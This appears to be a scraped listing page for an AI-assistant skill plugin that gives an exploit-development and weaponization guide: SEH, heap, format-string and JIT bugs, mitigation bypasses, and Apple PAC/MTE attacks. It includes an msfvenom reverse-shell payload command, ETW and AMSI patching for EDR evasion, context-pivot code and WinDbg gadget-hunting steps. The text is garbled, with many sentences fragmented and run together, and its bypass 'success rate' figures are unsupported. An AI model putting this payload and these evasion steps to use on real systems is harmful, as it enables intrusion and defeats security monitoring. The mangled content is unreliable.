From cybersec-toolkit
Operational guide for exploit development: environment setup, debugging workflow, PoC lifecycle, pwntools/pwndbg usage, heap exploitation, and weaponization. For authorized security research only.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:offensive-exploit-developmentThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
- **Skill Name**: exploit-development
Exploit development operational guide: environment setup, debugging workflow, PoC development lifecycle, writing reliable exploits, using pwntools/pwndbg, heap exploitation techniques, and weaponization considerations. Use when actively developing exploits or setting up an exploit dev environment.
Use this skill when the conversation involves any of:
exploit development, pwntools, pwndbg, heap exploitation, PoC development, exploit reliability, weaponization, debugging workflow, exploit dev environment
When this skill is active:
offensive-bug-identification skill) document for more informationoffensive-fuzzing skill) for specific fuzzing topics
flowchart LR
BugId["Bug Identification"] --> Analysis["Vulnerability Analysis"]
Testing["Testing & Refinement"] --> Deployment["Deployment"]
subgraph "Analysis Phase"
direction LR
Root["Root Cause Analysis"]
Trig["Trigger Identification"]
Impact["Impact Assessment"]
end
subgraph "Weaponization Phase"
direction LR
MitBypass["Mitigation Bypass"]
Payload["Payload Development"]
Reliability["Reliability Improvements"]
end
Analysis --> Root
Analysis --> Trig
Analysis --> Impact
Root --> MitBypass
Impact --> Payload
Trig --> Payload
MitBypass --> Payload
Payload --> Reliability
Reliability --> Testing
Testing --> MitBypass
class BugId,Analysis,Testing,Deployment primary
Involves memory on the stack getting corrupted due to improper bounds checking when a memory write operation takes place.
strcpy copies user‐supplied file path into a 256‑byte stack buffer when handling STOR commands.STOR / followed by 420 bytes of A… to overflow the buffer and clobber SEH frame.pop pop ret inside msvcrt.dll; pivot to payload that disables DEP via ROP then spawns a reverse shell.strcpy with strncpy_s and enabling /DYNAMICBASE /GS.ntdll!KiUserExceptionDispatcher is responsible for the exception handling process which itself calls RtlDispatchExceptionRtlDispatchException retrieves the TEB and parses the exception handling linked list using NtTib->ExceptionListSEHOP remains enabled by default.
Load Configuration Directory → GuardEHContinuations in the PE header (e.g., dumpbin /loadconfig or a lief script)./GS, /CETCOMPAT; the classic approach of choosing a module without SafeSEH or ASLR is increasingly rare. Verify per target.RtlpExecuteHandlerForException calls the ntdll!ExecuteHandler2 which in turn calls the actual exception handler function after validationExceptionList starting at the bufferpop-pop-ret sequence to use in the exploit, you also need to identify and remove bad charactersVirtualProtect) or a target module compiled without /guard:cf.The link to something isn't available anymore, so we just replace it with our binary and take over the program.
core::media::AudioRenderer failed to remove a task from the render queue on stream abort, leaving a dangling pointer.AudioContext rapid open‑close loop × 1 000 on Windows 11 23H2.VirtualProtect to run shellcode.std::erase_if queue purge.C++ class and uses virtual functions
vptr is created at compile time and points to a virtual function table vtable/vftableRAX, a call is made to the appropriate offset for the desired virtual functionoffensive-mitigations skill) or Modern (see the offensive-mitigations skill)AudioRingBuffer write corrupts size field of next tcache chunk (glibc 2.40).fd pointer coerces allocator into returning overlapping chunk; arbitrary R/W → GOT hijack → RCE.__builtin_object_size guard (Chromium 123 commit a1b2c3).heap_base, craft overlapping chunks, pivot to arbitrary R/W, then chain to code‑execution.
calloc() now pre‑fills the tcache and safe‑linking checks trigger earlier; the older fastbins‑dupes shortcut no longer works. Use tcache‑stashing‑unlink or House of KIWI instead on 2.41+.NtSetInformationIoRing urb‑array handling leads to write‑what‑where in kernel context.offensive-bug-identification skill)
size_t to 32‑bit DWORD across IPC or FFI boundaries can yield negative indexing and oversized allocations; especially common in cross‑arch components.vsnprintf, ...)%n modifier)move esp, r32 or xchg esp, r32EHLO argument directly into syslog() format string.EHLO %43$p|%45$s during SMTP handshake.%n payload to overwrite __free_hook with system()."%s" wrapper and enabling -Wformat-security.A vulnerability where an application processes an object as a different type than intended, leading to memory corruption or logic bypass.
CheckBounds elimination incorrectly assumes array element type during JIT optimization, allowing tagged pointer confusion.SMI/HeapNumber array.length field to achieve OOB R/W; pivot to WASM RWX page for shellcode.dynamic_cast checkspocs/.pwndbg / gef built-ins (no bundled alias pack)offensive-bug-identification skill)ropper / ROPgadget (registry tools)cyclic, diff in pwndbg/gef (no bundled scanner)offensive-mitigations skill)0x00) and return carriage (0x0D, 0x0A) if in weboffensive-shellcode skill) for comprehensive techniquesmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "<list_of_bad_chars>"
# make sure to precede this payload with some NOPs to create space for the getPC operation(decoding of shikata_ga_nai)
# attackBuffer = filler+eip+offset+nops+shellcode
Check out Shellcode (see the offensive-shellcode skill)
IBT/CET note (x86‑64): place ENDBR64 at entry for valid indirect targets when IBT is enabled. Example prologue bytes: F3 0F 1E FA.
EtwEventWrite) with ret sleds or stubbed functions while evading PatchGuard.amsi!AmsiScanBuffer) with 0x80070057 (E_INVALIDARG) to short‑circuit scanning.Operational safety checklist (see also EDR (see the offensive-edr-evasion skill)):
MEM_IMAGE loaders.MEM_IMAGE loaders.offensive-mitigations skill) or Modern Mitigations (see the offensive-mitigations skill)NtContinue, APC queue + SetThreadContext, or SEH/JOP where CET returns are enforced// Minimal NtContinue pivot (ROP‑less) — set RIP/RSP to a safe call target
typedef NTSTATUS (NTAPI *pNtContinue)(PCONTEXT, BOOLEAN);
void pivot_with_ntcontinue(CONTEXT *ctx, void *next_rip, void *new_rsp) {
RtlCaptureContext(ctx);
ctx->Rip = (DWORD64)next_rip; // valid import thunk or allowed GFID target
ctx->Rsp = (DWORD64)new_rsp; // keep shadow‑stack alignment plausible
((pNtContinue)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtContinue"))(ctx, FALSE);
}
// APC + SetThreadContext — schedule execution at an import thunk to satisfy XFG
void apc_setctx(HANDLE hThread, void *start, void *param) {
CONTEXT c = { .ContextFlags = CONTEXT_FULL };
GetThreadContext(hThread, &c);
c.Rip = (DWORD64)start; // e.g., kernel32!LoadLibraryW stub
c.Rcx = (DWORD64)param; // first argument
SetThreadContext(hThread, &c);
QueueUserAPC((PAPCFUNC)start, hThread, (ULONG_PTR)param);
}
MEM_IMAGE‑mapped payloads (ghosting/doppelganging/herpaderping) over MEM_PRIVATE RWXMEM_IMAGE → create process from section.MEM_IMAGE and passes loader checks.All three avoid MEM_PRIVATE payloads that hotpatch checks reject in 24H2 (see Modern Mitigations → OS Loader changes).
| Mitigation | Default platforms (2025) | Protects | Common bypass primitive |
|---|---|---|---|
| DEP / NX | All major OSes | Code execution in data pages | ROP/JOP pivot to RWX or change page permissions |
| ASLR | All | Base‑address disclosure | Info leak + partial overwrite / brute‑force |
| CFG (v1) | Windows 8.1+ | Indirect calls integrity | Abuse writable/exempt module, ret‑slide into target |
| CET Shadow Stack | Windows 10 2004+, Linux 6.1 (x86) | Return‑address integrity | Disable CET (SetProcessMitigationPolicy) or pivot via JOP |
| XFG | Windows 11 22H2+ | Indirect‑call target integrity | Use JOP gadgets or stub out guard function section |
| GuardEHContinuation | Windows 11 24H2 (x64) | SEH overwrite attempts | JOP stub into verified handler region |
| MTE | Android 14+, Linux 6.8 (ARM64) | Heap/stack OOB & UAF | Tag brute‑force or TAGSYNC alias |
| CIG / ACG | Windows 10+ | Unsigned code / RWX pages | Map signed RWX driver or relocate section |
.github/workflows/exploit.yml passes.run_script (no bundled repro.sh)rr record / rr replay directly (rr is a registry tool)afl-showmap / afl-cov (registry tools)For SEH exploitation:
# exception data will be inside TEB under NtTib->ExceptionList
dt nt!_TEB
# getting the <exp_addr> of exceptionlist
!teb
# getting the first item in the exception handler linked list, continue to see them using the `Next` param
# the last item should be `ntdll!FinalExceptionHandlerPad`
dt _EXCEPTION_REGISTRATION_RECORD <exp_addr>
# getting more information about the exception
!exchain
# setting a breakpoint on the exceution handler
bp ntdll!ExecuteHandler2
# see what is execution handler doing(use it to identify exploitation point in buffer)
u @eip L11
# to identify bad pods, execute till eip is yours, then
# repeat the process several times to identify all bad chars
dds esp L5 # identify second argument
db <second_argument>
# finding a pop/pop/ret
.load wdbgext
!wdbgext.modlist
lm m <module_without_dep_aslr_safeseh>
$><G:\Projects\poppopret.wds
u <first_adr_found> L3
# we need to create a short jump in our shellcode
# looking for our shellcode
!exchain
bp <adr>
g
# run the following till after your short jump
t
!teb
s -b <stack_limit> <stack_base> 90 90 90 90 43 43 43 43 43 43 43 43
dd <shellcode_adr> L65
? <shellcode_adr> - <current_esp>
For general WinDbg commands:
# finding out a suitable jump stub
lm m syncbrs # to get start <addr> of a module named syncbrs
dt ntdll!_IMAGE_DOS_HEADER <addr> # to get e_lfanew that has the offset to PE header
? <pe_header> # to get the hex addr
dt ntdll!_IMAGE_NT_HEADERS64 <addr>+<pe_hex_header> # to get image optional header
dt ntdll!_IMAGE_OPTIONAL_HEADER64 <addr>+<pe_hex_header>+<pe_optional_header> # to get DllCharachteristics
# you can automate this using process explorer or process hacker
# find an executable or module without DEP, ASLR
lm m libspp.dll # get the base address of the suitable module you found previously
s -b <mod_start_addr> <mod_end_addr> 0xff 0xe4 # find `jmp $esp` inside that module
# make sure the address doesn't contain bad chars
u <jmp_esp_addr> # to confirm
bp <jmp_esp_addr>
# override eip with jmp_esp_addr to force the program to jump to esp after buffer overflow
t
dc eip L4 # you should see the rest of your shellcode here
# checking which process we're currently in
!process @@(@$prcb->CurrentThread->ApcState.Process) 0
For UAF debugging:
# HEAP information
!heap -s # to print heap information
dt _HEAP <heap_addr> # to print infromation regarding a heap
dt _LFH_HEAP <heap_addr> # to print information about a low fragmentation header heap
# Identifying UAF location
# attach to crashed application, identify the name of function that crashed
uf <crashed_function_name> # to see the function
dd rcx # to checkout what got filled, replace rcx with the register name from above
dt _DPH_BLOCK_INFORMATION rcx-20 # usefull information
!heap -p -a rcx # call stack information, what led to this object being freed
Modern exploit chains should replay deterministically in CI so regressions are caught quickly.
name: exploit-regression
on: [push, pull_request]
jobs:
replay:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Build target container
run: docker build -t vulnapp ./docker
- name: Run exploit replay
run: ./repro.sh --ci --target vulnapp # your own replay script
| Tool / Framework | Version | Platform tested |
|---|---|---|
| IDA Pro | 8.4 SP1 | Windows 11 24H2 |
| Ghidra | 11.0.2 | Debian 12 |
| BinDiff | 10.8 | with IDA 8.4 |
| Ropper | 2.0.7 | CET‑aware build |
| rr (record/replay) | Latest | Ubuntu 24.04 |
| AFL++ | 4.10‑dev | snapshot mode |
[!TIP] Keep this matrix in each PoC directory so future contributors can reproduce results exactly.
PID 4 and replace your own token )offensive-edr-evasion skill)unsafe blocks: Vec::from_raw_parts, std::ptr::copy_nonoverlapping, and mem::transmute misuse.Vmxnet3, Hyper‑V enlightened IOMMU bugs, and QEMU vhost‑user integer overflows.runC / CRI‑O escape using malformed seccomp filters or WASM shims.ptrauth_sign_unauthenticated.Modern Apple Silicon devices introduce unique security features and attack surfaces requiring specialized techniques.
Pointer Authentication Code (PAC)
PACIA/PACIB instructions create cryptographic signatures for return addresses and function pointersAUTIA/AUTIB gadgets, ptrauth_sign_unauthenticated abuse, speculative PAC oracle attacksAPIAKey and APIBKey in system registersMemory Tagging Extension (MTE)
Hypervisor.framework Exploitation
XPC Service Exploitation
com.apple.security.syspolicy or com.apple.windowserver for TCC bypassKernel Extension Loading
SCTLR_EL1 manipulationiOS/iPadOS Kernel Exploitation
kalloc.16 or kalloc.32 zoneshost_special_port access# Enable SIP bypass for kernel debugging (requires physical access)
csrutil disable --without kext --without debug
# LLDB kernel debugging setup
sudo nvram boot-args="debug=0x141 kext-dev-mode=1 amfi_get_out_of_my_way=1"
# PAC analysis with jtool2/iOS App Store extraction
jtool2 -d __TEXT.__text binary | grep -E "(PACIA|PACIB|AUTIA|AUTIB)"
# MTE tag analysis (requires iOS 16+ device with checkra1n/palera1n jailbreak)
ldid -S entitlements.plist target_binary # Add get-task-allow for debugging
| Mitigation | Coverage | Bypass Technique | Success Rate |
|---|---|---|---|
| PAC | Return addresses, func ptrs | JOP/speculative oracle | ~70% |
| MTE | Heap/stack OOB, UAF | Tag brute‑force/TikTag | ~85% |
| PPL (Page Protection Layer) | Kernel code pages | Hypervisor escape | ~40% |
| KTRR (Kernel Text Readonly Region) | Kernel .text segment | Hardware vuln required | <10% |
IBPB, IBRS, and fine‑grained hardware fences.npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitTurns memory-corruption bugs into reliable PoCs with primitive chains (leak → R/W → control flow) against modern mitigations. Covers stack/ROP, glibc heap & FSOP, format strings, browser/JIT type confusion & UAF, and Linux/Windows kernel LPE.
Assists with authorized exploit development, PoC creation, payload engineering, and shellcode analysis for security testing, CTFs, and bug bounties.
Structures exploit development training with a weekly syllabus covering fuzzing, vulnerability classes, and advanced exploitation. Use to onboard researchers or plan a course.